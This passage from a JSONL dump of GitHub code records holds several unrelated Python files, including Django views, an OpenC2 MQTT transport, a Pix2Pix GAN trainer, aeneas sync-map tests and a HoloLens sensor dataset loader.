plt.xlabel('Time')\n plt.ylabel('Difference (Original - Corrected pulse)')\n plt.grid(linestyle='dotted')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/png/diff_plot_{name}.png')\n plt.savefig(f'/home/stephy/ICECUBE/undershoot/20200519/ideal_pulse_correction/svg/diff_plot_{name}.svg')\n #plt.show()\n plt.clf()\n plt.cla()\n plt.close()\n\n\ndef main():\n check_integral = 'False'\n type_pulse_sq = ideal_square_pulse()\n correct(check_integral, type_pulse_sq, 'Square')\n type_pulse_gaus = ideal_gaussian_pulse()\n correct(check_integral, type_pulse_gaus, 'Gaussian')\n type_pulse_2gaus = ideal_2gaussian_pulse()\n correct(check_integral, type_pulse_2gaus, '2Gaussian')\n #type_pulse = ideal_poisson_pulse()\n #correct(check_integral, type_pulse, 'Poisson')\n type_pulse_noise = noisy_gaussian_pulse()\n correct(check_integral, type_pulse_noise, 'Noisy_Gaussian')\n\n\n\nif __name__ == \"__main__\":\n global tau\n global width\n global Amp\n tau = 1.5\n width = 1 #only for drooping manually an square pulse\n Amp = 1.5\n main()\n","repo_name":"stephanyvargas/Correction","sub_path":"reconstruction_ideal_pulse.py","file_name":"reconstruction_ideal_pulse.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20437628780","text":"# https://www.codeeval.com/open_challenges/40/\nimport sys\ntest_cases = open(sys.argv[1], 'r')\n# test_cases = open('self_describing_numbers.txt', 'r')\ntest_lines = (line.rstrip() for line in test_cases)\n\nfor test in test_lines:\n\tsuccess = 1\n\tfor pos, val in enumerate(test):\n\t\tif int(val) != test.count(str(pos)):\n\t\t\tsuccess = 
0\n\tsys.stdout.write(str(success))\n\tsys.stdout.write(\"\\n\")\n\tsys.stdout.flush()\n","repo_name":"stascrash/codeeval","sub_path":"self_describing_numbers.py","file_name":"self_describing_numbers.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20107097786","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom .models import SPARQLModel\n\n\ndef index(request):\n employees = SPARQLModel().get_employees()\n roles = SPARQLModel().get_roles()\n departments = SPARQLModel().get_departments()\n levels = SPARQLModel().get_levels()\n leaves = SPARQLModel().get_leaves()\n employment_types = SPARQLModel().get_employment_type()\n education = SPARQLModel().get_education()\n branches = SPARQLModel().get_branches()\n projects = SPARQLModel().get_projects()\n return render(request, 'home.html', {'roles': roles, 'departments': departments, 'levels': levels, 'leaves': leaves,\n 'employment_type': employment_types, 'education': education,\n 'branches': branches, 'projects': projects, 'employees': employees})\n\n\ndef description(request):\n if request.method == 'GET':\n if request.GET['employee_id'] != \"\":\n employee = SPARQLModel().employee_details(id=request.GET['employee_id'])\n return render(request, 'description.html', {'employee': employee})\n return render(request, 'description.html')\n\n\ndef search_results(request):\n if request.method == 'GET':\n if request.GET['emp_name'] != \"\":\n employees = SPARQLModel().search_employees(request.GET['emp_name'])\n else:\n employees = SPARQLModel().get_employees()\n response = {'employees': employees}\n return JsonResponse(response)\n\n\ndef advance_search(request):\n if request.method == 'GET':\n filters = {}\n if request.GET['emp_name'] != \"\":\n filters['name'] = request.GET['emp_name']\n if request.GET['emp_dept'] != \"\":\n filters['department'] = request.GET['emp_dept']\n roles = SPARQLModel().get_department_roles(department=filters['department'])\n else:\n roles = SPARQLModel().get_roles()\n if request.GET['emp_role'] != \"\":\n filters['role'] = request.GET['emp_role']\n if request.GET['emp_branch'] != \"\":\n filters['branch'] = request.GET['emp_branch']\n if request.GET['emp_employ_type'] != \"\":\n filters['employment_type'] = request.GET['emp_employ_type']\n if request.GET['emp_leave'] != \"\":\n filters['leave'] = request.GET['emp_leave']\n employees = SPARQLModel.get_advance_search(filters=filters)\n response = {'roles': roles, 'employees': employees}\n return JsonResponse(response)\n\n","repo_name":"saichandreddykamana/Master-s-Assignments","sub_path":"Employee_Management_System/EMS/EmployeeSystem/EmployeeSystem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5540077976","text":"from oslo_log import log\nimport six\nfrom voluptuous import All\nfrom voluptuous import Any\nfrom voluptuous import Invalid\nfrom voluptuous import Length\nfrom voluptuous import Marker\nfrom voluptuous import Required\nfrom voluptuous import Schema\nfrom voluptuous import Upper\n\nfrom monasca_api.v2.common.schemas import exceptions\n\n\nLOG = log.getLogger(__name__)\n\nMAX_ITEM_LENGTH = 50\n\n\ndef validate_action_list(notification_ids, action_type):\n if not isinstance(notification_ids, list):\n raise Invalid('Not a list: {}'.format(type(notification_ids)))\n existing = []\n 
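# ids seen so far; a duplicate id raises Invalid below\n 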
for notification_id in notification_ids:\n if not isinstance(notification_id, (str, six.text_type)):\n raise Invalid('list item <{}> -> {} not one of (str, unicode)'\n .format(notification_id, type(notification_id)))\n if len(notification_id) > MAX_ITEM_LENGTH:\n raise Invalid('length {} > {}'.format(len(notification_id),\n MAX_ITEM_LENGTH))\n if notification_id in existing:\n raise Invalid('Duplicate {} notification method {}'\n .format(action_type, notification_id))\n existing.append(notification_id)\n\n\ndef validate_ok_action_list(v):\n validate_action_list(v, 'OK')\n\n\ndef validate_alarm_action_list(v):\n validate_action_list(v, 'ALARM')\n\n\ndef validate_undetermined_action_list(v):\n validate_action_list(v, 'UNDETERMINED')\n\n\nalarm_definition_schema = {\n Required('name'): All(Any(str, six.text_type), Length(max=255)),\n Required('expression'): All(Any(str, six.text_type)),\n Marker('description'): All(Any(str, six.text_type), Length(max=255)),\n Marker('severity'): All(Upper, Any('LOW', 'MEDIUM', 'HIGH', 'CRITICAL')),\n Marker('match_by'): Any([six.text_type], [str]),\n Marker('ok_actions'): validate_ok_action_list,\n Marker('alarm_actions'): validate_alarm_action_list,\n Marker('undetermined_actions'): validate_undetermined_action_list,\n Marker('actions_enabled'): bool}\n\n\ndef validate(msg, require_all=False):\n try:\n request_body_schema = Schema(alarm_definition_schema,\n required=require_all,\n extra=True)\n request_body_schema(msg)\n except Exception as ex:\n LOG.debug(ex)\n raise exceptions.ValidationException(str(ex))\n","repo_name":"openstack/monasca-api","sub_path":"monasca_api/v2/common/schemas/alarm_definition_request_body_schema.py","file_name":"alarm_definition_request_body_schema.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"54"} +{"seq_id":"18719063169","text":"\"\"\"\nAuthor: Noa Kirschbaum\nAssignment / Part: HW10 - Q2\nDate due: 2022-05-05\nI pledge that I have completed this assignment without\ncollaborating with anyone else, in conformance with the\nNYU School of Engineering Policies and Procedures on\nAcademic Misconduct.\n\"\"\"\n\nfrom hw10_q1 import Weapon\nimport random\n\nclass Duelist:\n def __init__(self, duelist_name, weapon_inventory):\n self.duelist_name = duelist_name\n self.weapon_inventory = weapon_inventory\n self.number_of_weapons = len(weapon_inventory)\n\n def __str__(self):\n final_str = \"Duelist object {}, carrying\".format(self.duelist_name)\n for i in range(self.number_of_weapons):\n if i+1 == self.number_of_weapons:\n final_str += \" and {} Weapon objects.\".format(self.weapon_inventory[i].weapon_name)\n else:\n final_str += \" {},\".format(self.weapon_inventory[i].weapon_name)\n\n return final_str\n\n def get_winner_of_duel_name(self, opponent):\n\n if self.number_of_weapons > 0 and opponent.number_of_weapons > 0:\n\n duelist_weapon = self.weapon_inventory[random.randint(0,self.number_of_weapons-1)]\n print(\"Duelist {} picked a {}!\".format(self.duelist_name, duelist_weapon.weapon_name))\n opponent_weapon = opponent.weapon_inventory[random.randint(0,opponent.number_of_weapons-1)]\n print(\"Duelist {} picked a {}!\".format(opponent.duelist_name, opponent_weapon.weapon_name))\n\n if duelist_weapon.strength > opponent_weapon.strength:\n if not duelist_weapon.does_break():\n return self.duelist_name\n else:\n print(\"{}'s weapon broke!\".format(self.duelist_name))\n return opponent.duelist_name\n elif duelist_weapon.strength < 
opponent_weapon.strength:\n if not opponent_weapon.does_break():\n return opponent.duelist_name\n else:\n print(\"{}'s weapon broke!\".format(opponent.duelist_name))\n return self.duelist_name\n else:\n print(\"Both duelists picked weapons of the same strength! The winner will be decided purely by pseudo-randomly generenated numbers!\")\n random_num = random.randint(1, 2)\n print(\"random number:\", random_num)\n if random_num == 1:\n return self.duelist_name\n else:\n return opponent.duelist_name\n\n\n\n\n elif self.number_of_weapons > 0 and opponent.number_of_weapons <= 0:\n print(\"Only one duelist has a weapon!\")\n return self.duelist_name\n elif opponent.number_of_weapons > 0 and self.number_of_weapons <= 0:\n print(\"Only one duelist has a weapon!\")\n return opponent.duelist_name\n else:\n return \"NO CONTEST.\"\n\n\ndef main():\n # Creating my Weapon objects\n weapon_1 = Weapon(\"Rickenbacker 4001c64\", 0.8)\n weapon_2 = Weapon(\"Hofner 500/1\", 0.6)\n weapon_3 = Weapon(\"Squier VI\", 0.4)\n weapon_4 = Weapon(\"Rickenbacker 330\", 0.8)\n weapon_5 = Weapon(\"Fender Vintera 60s Mustang\", 0.6)\n weapon_6 = Weapon(\"Gretsch 6122\", 0.4)\n # Creating my Duelist objects\n bass_player = Duelist(\"Aki Mizuguchi\", [weapon_1, weapon_2, weapon_3])\n guitarist = Duelist(\"Yori Asanagi\", [weapon_4, weapon_5, weapon_6])\n # Testing the get_winner_of_duel_name method of the Duelist object 'bass_player' a few times\n number_of_duels = 10\n for duel_number in range(number_of_duels):\n winner = bass_player.get_winner_of_duel_name(guitarist)\n print(\"THE WINNER OF DUEL #{} IS {}!\".format(duel_number + 1, winner), end=\"\\n\\n\")\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"NSkyeKirsch/Hw10-CS1114","sub_path":"hw10_q2.py","file_name":"hw10_q2.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2359249819","text":"from examples.Visitor.visitor_example import App, Beverage, Snack, CompositeProduct, ConcreteVisitor\n\n\ndef test_visitor():\n app = App()\n products = [Beverage(), Snack(), Snack()]\n composite = CompositeProduct()\n for product in products:\n composite.add(product)\n visitor = ConcreteVisitor()\n assert app.main(p=composite, v=visitor) == 1500 + 2000 + 2000\n","repo_name":"Buzzvil/awesome-design-patterns","sub_path":"examples/Visitor/test_visitor_example.py","file_name":"test_visitor_example.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"20918781017","text":"# Ejercicio 1 : Llenar una lista\n# Llenar una lista con los numeros del 1 al 50, luego mostrar\n#la lista con el bucle for, los elementos deben mostrase\n# de la siguiente forma:\n#1-2-3-4-5... 
-50\n\nlista = []\nfor i in range(1, 51):\n    lista.append(i)\n# print the elements joined by dashes, exactly in the form 1-2-...-50\nprint(\"-\".join(str(n) for n in lista))\n\n","repo_name":"DanielGuerrero03/TecnicaturaGit","sub_path":"Python/Leccion4/Ejercicio01.py","file_name":"Ejercicio01.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30299365216","text":"import ssl\nimport traceback\nimport paho.mqtt.client as mqtt\n\nfrom benedict import benedict\nfrom paho.mqtt.packettypes import PacketTypes\nfrom paho.mqtt.properties import Properties\nimport toml\nfrom oc2.message_manager import HEADERS_ACTUATOR_ID_PATH, HEADERS_REQUEST_ID_PATH, build_response_msg_bytes, process_oc2_msg, validate_msg_required_properties, validate_schema\n\nfrom utils.utils import convert_to_dict, find_file_names_by_extension, load_file\nfrom main import client_id\n\ndef on_connect(client, userdata, flags, rc):\n    print(\"mqtt: New mqtt instance connected\")\n    # client.subscribe(\"$SYS/#\")\n    client.connected_flag=True \n\n\ndef on_log(client, userdata, level, buf):\n    print(\"mqtt: \", buf) \n\n\ndef publish(topic = None, msg = \"test\"):\n\n    if topic is None:\n        topic = default_rsp_topics[0]\n\n    print(\"mqtt: Publishing ->\")\n    print(\"\\t Topic \\t\\t=\" ,topic) \n    print(\"\\t Message \\t=\" ,msg) \n    b_msg = msg.encode('utf-8').strip() \n\n    openc2_properties = Properties(PacketTypes.PUBLISH)\n    if \"v3\" in default_protocol:\n        openc2_properties = None \n    else:\n        openc2_properties.PayloadFormatIndicator = 1\n        openc2_properties.ContentType = 'application/openc2'\n        openc2_properties.UserProperty = [('msgType', 'rsp'), ('encoding', 'json')] \n\n    qos = 0\n    retain = False\n\n    return client.publish(topic, b_msg, qos, retain, openc2_properties)\n\n\ndef on_message(client, userdata, message):\n    try:\n        msg_str = str(message.payload.decode(\"utf-8\"))\n        print(\"MQTT Message Received *\")\n        print(\"\\t Message \\t=\" ,msg_str)\n        print(\"\\t Topic \\t\\t=\",message.topic)\n        print(\"\\t QOS \\t\\t=\",message.qos)\n        print(\"\\t Retain flag \\t=\",message.retain) \n\n        message_dict = convert_to_dict(msg_str)\n        msg_benedict = benedict(message_dict)\n\n        # Load Schema\n        config_data = toml.load(\"config.toml\")\n        path = config_data[\"schema_path\"]\n        filename = config_data[\"schema_file\"]\n        schema_dict = load_file(path, filename)\n        \n        # Validate\n        invalid_schema = validate_schema(schema_dict)\n        if invalid_schema:\n            raise Exception(invalid_schema)\n\n        invalid_msg = validate_msg_required_properties(msg_benedict)\n        if invalid_msg:\n            raise Exception(invalid_msg)\n\n        # Do work... 
\n        status = 200\n        work_result = \"No work performed\" \n        if invalid_schema == None and invalid_msg == None: \n            work_result = process_oc2_msg(msg_benedict)\n\n    except Exception as e:\n        print(traceback.format_exc())\n        status = 500\n        work_result = \"Error processing mqtt message: \" + traceback.format_exc()\n\n    # Build Response\n    response_msg = build_response_msg_bytes(msg_benedict[HEADERS_REQUEST_ID_PATH],\n                                            client_id,\n                                            status,\n                                            msg_benedict[HEADERS_ACTUATOR_ID_PATH],\n                                            work_result) \n\n    publish(default_rsp_topics[0], response_msg)\n\n\ndef set_user_pw(user: str = None, pw: str = None):\n\n    if user is None:\n        user = default_username\n\n    if pw is None:\n        pw = default_password\n\n    client.username_pw_set(user, pw)\n    client.tls_set(certfile=None,\n                   keyfile=None,\n                   cert_reqs=ssl.CERT_REQUIRED) \n\n\ndef connect_to_broker(broker: str = None, port: str = None):\n\n    if broker is None:\n        broker = default_broker\n\n    if port is None:\n        port = default_port \n\n    try:\n        client.connect(broker, port) \n    except Exception:\n        print(\"mqtt: Unable to connect to MQTT Broker\")\n        print(traceback.format_exc()) \n\n\ndef subscribe_to_topics(topics: list = None):\n\n    if topics is None:\n        topics = []\n        topics.extend(default_cmd_topics)\n\n    for topic in topics:\n        print(\"mqtt: Subscribing to Topic: \", topic)\n        client.subscribe(topic) \n\n\ndef shutdown():\n    print(\"Shutting down MQTT Instance: \", client_id)\n    client.disconnect()\n    client.loop_stop()\n\n\nconfig_data = toml.load(\"config.toml\")\ndefault_broker = config_data[\"MQTT\"][\"broker\"]\ndefault_port = config_data[\"MQTT\"][\"port\"]\ndefault_protocol = config_data[\"MQTT\"][\"protocol\"]\n\ndefault_cmd_topics = config_data[\"MQTT\"][\"listen_topics\"]\ndefault_rsp_topics = config_data[\"MQTT\"][\"resp_topics\"] \n\ndefault_username = config_data[\"MQTT\"]['username'] \ndefault_password = config_data[\"MQTT\"]['password'] \n\nif default_protocol == \"MQTTv5\":\n    client = mqtt.Client(client_id, None, userdata=True, protocol=mqtt.MQTTv5, transport=\"tcp\") \nelse:\n    client = mqtt.Client(client_id, None, userdata=True, protocol=mqtt.MQTTv311, transport=\"tcp\") \n\n# attach the callbacks to the protocol-specific client created above\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_log = on_log\n\nprint(\"MQTT Instance Started\")\nprint(\"\\t Client ID \\t\\t= \", client_id)\nprint(\"\\t Default Broker \\t= \", default_broker)\nprint(\"\\t Default Port \\t\\t= \", default_port)\nprint(\"\\t Default Protocol \\t= \", default_protocol)\nprint(\"\\t Default CMD Topics \\t= \", default_cmd_topics)\nprint(\"\\t Default RSP Topics \\t= \", default_rsp_topics)\nprint() \n\nhb_path = config_data[\"KESTREL\"][\"huntbook_paths\"][0]\nprint(\"Kestrel Info:\")\nprint(\"\\t Datasources \\t\\t= \", config_data[\"KESTREL\"][\"datasources\"])\nprint(\"\\t Huntbook Paths \\t= \", config_data[\"KESTREL\"][\"huntbook_paths\"])\nprint(\"\\t Huntbooks Available \\t= \", find_file_names_by_extension(\"hf\", hb_path))\nprint() ","repo_name":"oasis-open/openc2-oif-device","sub_path":"transports/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":5541,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"20209710399","text":"import unittest\n\nfrom aeneas.exacttiming import Decimal\nfrom aeneas.exacttiming import TimeInterval\nfrom aeneas.exacttiming import TimeValue\nfrom aeneas.language import Language\nfrom aeneas.syncmap import SyncMap\nfrom aeneas.syncmap import SyncMapFormat\nfrom aeneas.syncmap import SyncMapFragment\nfrom 
aeneas.syncmap import SyncMapMissingParameterError\nfrom aeneas.textfile import TextFragment\nimport aeneas.globalconstants as gc\nimport aeneas.globalfunctions as gf\n\n\nclass TestSyncMap(unittest.TestCase):\n\n NOT_EXISTING_SRT = gf.absolute_path(\"not_existing.srt\", __file__)\n EXISTING_SRT = gf.absolute_path(\"res/syncmaps/sonnet001.srt\", __file__)\n NOT_WRITEABLE_SRT = gf.absolute_path(\"x/y/z/not_writeable.srt\", __file__)\n\n PARAMETERS = {\n gc.PPN_TASK_OS_FILE_SMIL_PAGE_REF: \"sonnet001.xhtml\",\n gc.PPN_TASK_OS_FILE_SMIL_AUDIO_REF: \"sonnet001.mp3\",\n gc.PPN_SYNCMAP_LANGUAGE: Language.ENG,\n }\n\n def read(self, fmt, multiline=False, utf8=False, parameters=PARAMETERS):\n syn = SyncMap()\n if multiline and utf8:\n path = \"res/syncmaps/sonnet001_mu.\"\n elif multiline:\n path = \"res/syncmaps/sonnet001_m.\"\n elif utf8:\n path = \"res/syncmaps/sonnet001_u.\"\n else:\n path = \"res/syncmaps/sonnet001.\"\n syn.read(fmt, gf.absolute_path(path + fmt, __file__), parameters=parameters)\n return syn\n\n def write(self, fmt, multiline=False, utf8=False, parameters=PARAMETERS):\n suffix = \".\" + fmt\n syn = self.read(SyncMapFormat.XML, multiline, utf8, self.PARAMETERS)\n handler, output_file_path = gf.tmp_file(suffix=suffix)\n syn.write(fmt, output_file_path, parameters)\n gf.delete_file(handler, output_file_path)\n\n def test_read(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_m(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, multiline=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_u(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, utf8=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_read_mu(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n syn = self.read(fmt, multiline=True, utf8=True)\n self.assertEqual(len(syn), 15)\n ignored = str(syn)\n\n def test_write(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt)\n\n def test_write_m(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, multiline=True)\n\n def test_write_u(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, utf8=True)\n\n def test_write_mu(self):\n for fmt in SyncMapFormat.ALLOWED_VALUES:\n self.write(fmt, multiline=True, utf8=True)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"readbeyond/aeneas","sub_path":"aeneas/tests/test_syncmap_all.py","file_name":"test_syncmap_all.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":2298,"dataset":"github-code","pt":"54"} +{"seq_id":"74814281762","text":"import torch\nimport os\n\nfrom torch.autograd import Variable\n\n\nclass Pix2Pix:\n def __init__(self, generator, discriminator):\n cuda = bool(os.environ.get('CUDA'))\n lr = float(os.environ.get('LR'))\n beta = (0.5, 0.999)\n\n self.generator = generator.cuda()\n self.discriminator = discriminator.cuda()\n\n self.optimizer_gen = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=beta)\n self.optimizer_disc_b = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=beta)\n\n self.mse_loss = torch.nn.MSELoss()\n self.l1_loss = torch.nn.L1Loss()\n self.adv_lamda = 1\n self.cycle_lambda = 10\n\n tensor = torch.cuda.FloatTensor if cuda else torch.Tensor\n self.target_real = Variable(tensor(1, 1).fill_(1.0), requires_grad=False)\n self.target_fake = Variable(tensor(1, 1).fill_(0.0), 
requires_grad=False)\n\n def train_step(self, batch):\n # Set model input\n\n real_a = Variable(batch['HE']).cuda()\n real_b = Variable(batch['PAS']).cuda()\n\n self.optimizer_gen.zero_grad()\n\n # GAN loss\n fake_b = self.generator(real_a)\n loss_l1 = self.l1_loss(fake_b, real_b) * self.adv_lamda\n\n # gan loss:\n fake_ab = torch.cat((real_a, fake_b), 1)\n pred_fake = self.discriminator(fake_ab)\n loss_gen_a2b = self.mse_loss(pred_fake, self.target_real) * self.adv_lamda\n\n # Total loss\n total_loss = loss_l1 + loss_gen_a2b\n total_loss.backward()\n self.optimizer_gen.step()\n\n self.optimizer_disc_b.zero_grad()\n with torch.no_grad():\n fake_b = self.generator(real_a)\n pred_fake = self.discriminator(torch.cat((real_a, fake_b), 1)) * self.adv_lamda\n pred_real = self.discriminator(torch.cat((real_a, real_b), 1)) * self.adv_lamda\n loss_disc_b = self.mse_loss(pred_fake, self.target_fake) + self.mse_loss(pred_real, self.target_real)\n\n loss_disc_b.backward()\n self.optimizer_disc_b.step()\n\n def predict(self, img):\n if torch.is_tensor(img):\n return self.generator(img.cuda()).detach().cpu().numpy()\n else:\n return self.generator(torch.from_numpy(img).cuda()).detach().cpu().numpy()\n","repo_name":"Falien164/StainConverter","sub_path":"torch_library/models/pix2pix.py","file_name":"pix2pix.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19658058777","text":"\"\"\"\n RGB\n principle_point, (rgb[rgb],rgb2world,focal_length) \n Depth\n lut, (depth[cam])\n Human\n (head[world], lefthand[world], righthand[world], gaze[world])\n Rig\n rig2cam,(rig2world) \n\"\"\"\n\n__all__ = [\n \"RGBDataset\",\n \"DepthDataset\",\n \"HumanDataset\",\n \"RigDataset\"\n]\nfrom typing import Tuple\nimport os\nimport cv2\nimport numpy as np\nfrom glob import glob \nfrom PIL import Image\nimport re\nfrom . 
import RGBFrame,\\\n    DepthFrame,\\\n    HumanFrame,\\\n    RigFrame\n\n\nTuple8ndarray = Tuple[np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray,np.ndarray]\n\n\nclass RGBDataset:\n    def __init__(self,base:str=\"../..\"):\n        meta_path = os.path.join(base,[i for i in os.listdir(base) if i.endswith(\"pv.txt\")][0])\n        self.w, self.h, self.intrinsics, self.rgb2worlds, self.timestamps = self.load_meta(meta_path)\n        self.paths = [os.path.join(base, \"PV\", f\"{t}.bytes\") for t in self.timestamps]\n        self.sort_timeline()\n    def sort_timeline(self):\n        # sort by the timestamps array (self.timestamp is the lookup method, not the data)\n        index = np.argsort(self.timestamps)\n        if np.all((index[1:] - index[:-1]) > 0):\n            return \n        else:\n            self.timestamps = self.timestamps[index]\n            # self.paths is a plain list, so reorder it element-wise\n            self.paths = [self.paths[i] for i in index]\n            self.intrinsics = self.intrinsics[index]\n            self.rgb2worlds = self.rgb2worlds[index]\n    def load_meta(self,meta_path:str)->Tuple[int,int,np.ndarray,np.ndarray,np.ndarray]: \n        w, h = None, None\n        cx, cy = None, None\n        intrinsics = []\n        rgb2worlds = []\n        timestamps = []\n        with open(meta_path) as f:\n            lines = f.readlines()\n            metas = lines[0].strip().split(\",\")\n            cx, cy, w, h = float(metas[0]), float(metas[1]), int(metas[2]), int(metas[3])\n            for frame in lines[1:]:\n                items = frame.split(',')\n                timestamps.append(np.uint64(items[0]))\n                fx, fy = float(items[1]), float(items[2])\n                intrinsics.append(np.array([[fx, 0, w-cx],\n                                            [0, fy, cy],\n                                            [0, 0, 1]]))\n                rgb2worlds.append(np.array(items[3:20]).astype(np.float32).reshape([4,4]))\n        return w, h, \\\n            np.stack(intrinsics, 0).astype(np.float32), \\\n            np.stack(rgb2worlds, 0).astype(np.float32), \\\n            np.array(timestamps,dtype=np.uint64)\n    def load_byte(self,byte_path:str)->np.ndarray:\n        with open(byte_path,\"rb\") as f:\n            bgra = np.frombuffer(f.read(), dtype=np.uint8)\n            bgra = bgra.reshape([self.h, self.w, 4])\n            rgb = cv2.cvtColor(bgra, cv2.COLOR_BGRA2RGB)\n        return rgb\n    def __getitem__(self,index:int)->RGBFrame:\n        return RGBFrame(rgb=self.load_byte(self.paths[index]), \n                        rgb2world=self.rgb2worlds[index],\n                        intrinsic=self.intrinsics[index],\n                        timestamp=self.timestamps[index])\n    def __len__(self):\n        return len(self.timestamps)\n    def timestamp(self,t:np.uint64):\n        index = np.argmin(abs(self.timestamps - t))\n        return self.__getitem__(index)\n    \nclass DepthDataset:\n    def __init__(self, base:str=\"../..\"):\n        path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\"_lut.bin\")][0]\n        self.lut = self.load_bin(path)\n        path = [os.path.join(base,i) for i in os.listdir(base) if i.startswith(\"Depth\") and os.path.isdir(os.path.join(base,i))][0]\n        self.paths = sorted(glob(f\"{path}/*[0-9].pgm\"))\n        # self.paths = [os.path.join(path, i) for i in self.paths]\n        self.timestamps = np.array([np.uint64(re.findall(f\"[0-9]+\",i)[0]) for i in self.paths]) \n    def __len__(self):\n        return len(self.timestamps)\n    def load_pgm(self, pgm_path:str):\n        return np.array(Image.open(pgm_path), dtype=np.uint16)\n    def load_bin(self, bin_path:str):\n        with open(bin_path, \"rb\") as f:\n            lut = np.frombuffer(f.read(), dtype=\"f\").reshape([-1, 3]).astype(np.float32)\n        return lut\n    def __getitem__(self,index:int)->DepthFrame:\n        return DepthFrame(\n            depth = self.load_pgm(self.paths[index]),\n            lut = self.lut,\n            timestamp = self.timestamps[index]\n        )\n    def timestamp(self,t):\n        index = np.argmin(abs(self.timestamps - t))\n        return self.__getitem__(index)\n\nclass HumanDataset:\n    def __init__(self,base:str=\"../..\"):\n        path = [os.path.join(base,i) for i in os.listdir(base) if i.endswith(\".csv\")][0]\n        self.heads,\\\n            self.lefthands,\\\n            self.righthands,\\\n            
self.gazes,\\\n            self.is_lefthand_avails,\\\n            self.is_righthand_avails,\\\n            self.is_gaze_avails,\\\n            self.timestamps = self.load_csv(path)\n    def load_csv(self, csv_path:str)->Tuple8ndarray:\n        timestamps = []\n        heads = []\n        lefthands = []\n        righthands = []\n        gazes = []\n        is_lefthand_avails = []\n        is_righthand_avails = []\n        is_gaze_avails = []\n        with open(csv_path) as f:\n            for line in f:\n                items = line.strip().split(',')\n                timestamps.append(\n                    np.uint64(items[0])\n                )\n                heads.append(\n                    np.array(items[1:17]).astype(np.float32).reshape([4,4])\n                )\n                if int(items[17]) == 1:\n                    lefthands.append(\n                        np.array(items[18:434]).astype(np.float32).reshape([26, 4, 4])[:,:,3]\n                    )\n                    is_lefthand_avails.append(True)\n                else:\n                    lefthands.append(\n                        np.zeros([26,4], dtype=np.float32)\n                    )\n                    is_lefthand_avails.append(False)\n                if int(items[434]) == 1:\n                    righthands.append(\n                        np.array(items[435:851]).astype(np.float32).reshape([26,4,4])[:,:,3]\n                    )\n                    is_righthand_avails.append(True)\n                else:\n                    righthands.append(\n                        np.zeros([26,4], dtype=np.float32)\n                    )\n                    is_righthand_avails.append(False)\n                if int(items[851]) == 1:\n                    gazes.append(\n                        np.array(items[852:861]).astype(np.float32)\n                    )\n                    is_gaze_avails.append(True)\n                else:\n                    gazes.append(\n                        np.zeros([9], dtype=np.float32)\n                    )\n                    is_gaze_avails.append(False)\n        return np.stack(heads, 0),\\\n            np.stack(lefthands, 0),\\\n            np.stack(righthands,0),\\\n            np.stack(gazes, 0),\\\n            np.array(is_lefthand_avails),\\\n            np.array(is_righthand_avails),\\\n            np.array(is_gaze_avails),\\\n            np.array(timestamps)\n    def sort_timeline(self):\n        # sort by the timestamps array (self.timestamp is the lookup method, not the data)\n        index = np.argsort(self.timestamps)\n        if np.all((index[1:] - index[:-1]) > 0):\n            return \n        else:\n            self.timestamps = self.timestamps[index]\n            self.heads = self.heads[index]\n            self.lefthands = self.lefthands[index]\n            self.righthands = self.righthands[index]\n            self.gazes = self.gazes[index]\n            self.is_lefthand_avails = self.is_lefthand_avails[index]\n            self.is_righthand_avails= self.is_righthand_avails[index]\n            self.is_gaze_avails = self.is_gaze_avails[index]\n    def __len__(self):\n        return len(self.timestamps)\n    def __getitem__(self,index:int)->HumanFrame:\n        return HumanFrame(\n            head = self.heads[index],\n            lefthand = self.lefthands[index] if self.is_lefthand_avails[index] else None,\n            righthand = self.righthands[index] if self.is_righthand_avails[index] else None,\n            gaze = self.gazes[index] if self.is_gaze_avails[index] else None,\n            timestamp = self.timestamps[index]\n        )    \n    def timestamp(self, t:np.uint64):\n        index = np.argmin(abs(self.timestamps - t))\n        return self.__getitem__(index)\n\nclass RigDataset:\n    def __init__(self,base:str=\"../..\"):\n        path = [os.path.join(base,i) for i in os.listdir(base) if 